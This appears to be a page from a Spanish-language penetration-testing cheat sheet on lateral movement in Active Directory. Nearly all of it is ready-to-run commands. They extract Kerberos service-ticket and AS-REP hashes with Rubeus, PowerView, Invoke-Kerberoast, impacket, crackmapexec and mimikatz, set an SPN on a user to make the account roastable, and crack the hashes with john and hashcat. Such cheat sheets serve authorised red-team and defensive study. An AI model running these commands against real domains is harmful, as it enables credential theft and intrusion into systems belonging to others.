5. Movimiento lateral

5.1. Kerberoasting

5.1.1. SPN identificadas

_Extracción de hashes_

Cuenta específica

Rubeus.exe kerberoast  /user:<user> /rc4opsec /outfile:hashes.txt
Request-SPNTicket -SPN "<SPN>" -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt
impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -request-user <USER> -outputfile hashes.txt

Todas las cuentas

#Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt

Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat <Hashcat:John> > hashes.txt
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
crackmapexec ldap DC-IP -u <USER> -p <PASS> --kerberoasting hashes.txt
impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -outputfile hashes.txt

#From memory to disk
kerberos::list /export

_Cracking Hashes_

john

john --wordlist=<wordlist path> hashes.txt

hashcat

hashcat -m 13100 --force -a 0 hashes.txt <wordlist path>

5.1.2. Set SPN

Set-DomainObject -Identity <USER> -Set @{serviceprincipalname='Service/Name'}

5.2. ASREPRoast

_Obtención de hashes_

De una cuenta específica

#ASREPRoast.ps1
Get-ASREPHash -UserName <USER> -Verbose

De todas las cuentas

Rubeus.exe asreproast /format:<hashcat:john> /outfile:hashes.txt
crackmapexec ldap DC-IP -u <USER> -p <PASS> --asreproast hashes.txt

GetNPUsers

#with Creds
impacket-GetNPUsers -request -dc-ip <IP> <Full.Domain>/<USER>:<PASSWORD> -format <hashcat:john> -outputfile hashes.txt
#with users
impacket-GetNPUsers -request -dc-ip IP -usersfile users .txt <Full.Domain>/ -format <hashcat:john> -outputfile hashes.txt

_Cracking hashes_

john

john --wordlist=<wordlist path> hashes.txt

hashcat

hashcat -m 18200 --force -a 0 hashes.txt <wordlist path>

Previous4. Spraying Next6. Siguientes pasos

Last updated 8 months ago

Was this helpful?